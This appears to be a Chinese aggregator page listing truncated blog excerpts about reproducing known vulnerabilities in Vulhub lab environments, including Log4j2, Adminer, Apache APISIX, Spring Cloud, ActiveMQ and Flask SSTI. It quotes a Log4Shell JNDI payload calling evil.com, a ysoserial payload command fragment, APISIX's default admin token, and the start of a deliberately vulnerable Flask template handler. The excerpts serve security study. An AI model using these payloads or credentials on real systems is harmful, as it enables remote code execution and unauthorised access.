代码编织梦想

vulhub中apache log4j2 lookup jndi 注入漏洞(cve-爱代码爱编程

Apache Log4j 2 是Java语言的日志处理套件,使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似于`${jndi:ldap://evil.com/example}`的lookup用于进行JNDI注入,执行任意代码。 1.服务启动后,访问`http://your-ip:

vulhub中apache log4j server 反序列化命令执行漏洞复现(cve-爱代码爱编程

Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。 1.我们使用ysoserial生成payload,然后直接发送给`your-ip:4712`端口即可。 java -jar ysoserial-master-v0.0

vulhub中adminer远程文件读取漏洞复现(cve-爱代码爱编程

Adminer是一个PHP编写的开源数据库管理工具,支持MySQL、MariaDB、PostgreSQL、SQLite、MS SQL、Oracle、Elasticsearch、MongoDB等数据库。 在其版本1.12.0到4.6.2之间存在一处因为MySQL LOAD DATA LOCAL导致的文件读取漏洞。 参考链接: https://git

vulhub中adminer elasticsearch 和 clickhouse 错误页面ssrf漏洞复现(cve-爱代码爱编程

Adminer是一个PHP编写的开源数据库管理工具,支持MySQL、MariaDB、PostgreSQL、SQLite、MS SQL、Oracle、Elasticsearch、MongoDB等数据库。 在其4.0.0到4.7.9版本之间,连接 ElasticSearch 和 ClickHouse 数据库时存在一处服务端请求伪造漏洞(SSRF)。 参

vulhub中apache apisix 默认密钥漏洞复现(cve-爱代码爱编程

Apache APISIX是一个高性能API网关。在用户未指定管理员Token或使用了默认配置文件的情况下,Apache APISIX将使用默认的管理员Token `edd1c9f034335f136f87ad84b625c8f1`,攻击者利用这个Token可以访问到管理员接口,进而通过`script`参数来插入任意LUA脚本并执行。   1.利用默认

vulhub中apache apisix dashboard api权限绕过导致rce(cve-爱代码爱编程

Apache APISIX是一个动态、实时、高性能API网关,而Apache APISIX Dashboard是一个配套的前端面板。 Apache APISIX Dashboard 2.10.1版本前存在两个API`/apisix/admin/migrate/export`和`/apisix/admin/migrate/import`,他们没有经过`dr

vulhub中spring的cve-爱代码爱编程

Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,当攻击者可以访问Actuator API的情况下,将可以利用该漏洞执行任意命令。 参考链接: https://tanzu.vmware.com/security/cve-2022-22947 https:

【vulhub漏洞复现】cve-爱代码爱编程

一、漏洞详情 影响版本:Apache ActiveMQ 5.x~5.14.0 漏洞原理:ActiveMQ中存储文件的fileserver接口支持写入文件,但是没有执行权限。可以通过MOVE文件至其他可执行目录下,从而实现文件写入并访问。 ActiveMQ在5.12.x~5.13.x版本中,默认关闭了fileserver这个应

【漏洞复现】vulhub 中间件漏洞_vulhub漏洞-爱代码爱编程

#免责声明: 本文属于个人笔记,仅用于学习,禁止使用于任何违法行为,任何违法行为与本人无关。 Tomcat Tomcat介绍 tomcat是一个开源而且免费的jsp服务器,默认端口:8080,属于轻量级应用服务器。它可以实现 JavaWeb程序的装载,是配置JSP(Java Server Page)和JAVA系统必备的一款环境。 在历

flask ssti漏洞复现_flask ssti漏洞修复-爱代码爱编程

1.源代码 from flask import Flask, request from jinja2 import Template app = Flask(__name__) @app.route("/") def index(): name = request.args.get('name', 'guest') t = Te

spring cloud function spel表达式命令注入(cve-爱代码爱编程

一、漏洞简介 Spring Cloud Function是一个用于构建和部署基于函数的微服务的框架。它使用SpEL表达式来处理函数的输入和输出。SpEL是一种强大的表达式语言,它允许开发人员在运行时动态地计算表达式。 由于Spring CloudFunction中RoutingFunction类的apply方法将请求头中的"spring.cloud.f

atlassian confluence 路径穿越与命令执行漏洞(cve-爱代码爱编程

说明: 1、文章环境通过vulhub搭建 2、此文无代码调试环节 抓包 搭建完成 confluence环境后,进入编辑页面。通过插入处添加更多 宏。选择任意一个,burp抓包可以看到漏洞相关的接口:/rest/tinym

vulhub-爱代码爱编程

1.Jetty WEB-INF 敏感信息泄露漏洞(CVE-2021-28164) docker-compose up -d 启动环境,显示8080端口被占用 修改 docker-compose.yml 中的映射端口 curl 访问 http://192.168.48.129:8090/WEB-INF/web.xml 显示404: 通过

[ vulhub漏洞复现篇 ] imagemagick 任意文件读取漏洞 (cve-爱代码爱编程

🍬 博主介绍 👨‍🎓 博主介绍:大家好,我是 _PowerShell ,很高兴认识大家~ ✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】 🎉点赞➕评论➕收藏 == 养成习惯(一键三连

[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-爱代码爱编程

🍬 博主介绍 👨‍🎓 博主介绍:大家好,我是 _PowerShell ,很高兴认识大家~ ✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】 🎉点赞➕评论➕收藏 == 养成习惯(一键三连

[ vulhub漏洞复现篇 ] ghostscript 沙箱绕过(任意命令执行)漏洞cve-爱代码爱编程

🍬 博主介绍 👨‍🎓 博主介绍:大家好,我是 _PowerShell ,很高兴认识大家~ ✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】 🎉点赞➕评论➕收藏 == 养成习惯(一键三连

【vulhub漏洞复现】thinkphp 2.x 任意代码执行_thinkphp 2.x 任意代码执行漏洞-爱代码爱编程

一、漏洞详情 影响版本 thinkphp 2.x 但是由于thinkphp 3.0版本在Lite模式下没有修复该漏洞,所以也存在该漏洞 漏洞原因: e 和 /e模式匹配路由: e 配合函数preg_replace()使用, 可以把匹配来的字符串当作正则表达式执行; /e 可执行模式,此为PHP

[ vulhub漏洞复现篇 ] solr 远程命令执行(cve-爱代码爱编程

🍬 博主介绍 👨‍🎓 博主介绍:大家好,我是 _PowerShell ,很高兴认识大家~ ✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】 🎉点赞➕评论➕收藏 == 养成习惯(一键三连

[ vulhub漏洞复现篇 ] ghostscript 沙箱绕过(任意命令执行)漏洞cve-爱代码爱编程

🍬 博主介绍 👨‍🎓 博主介绍:大家好,我是 _PowerShell ,很高兴认识大家~ ✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】 🎉点赞➕评论➕收藏 == 养成习惯(一键三连

[ vulhub漏洞复现篇 ] drupal core 8 pecl yaml 反序列化任意代码执行漏洞(cve-爱代码爱编程

🍬 博主介绍 👨‍🎓 博主介绍:大家好,我是 _PowerShell ,很高兴认识大家~ ✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】 🎉点赞➕评论➕收藏 == 养成习惯(一键三连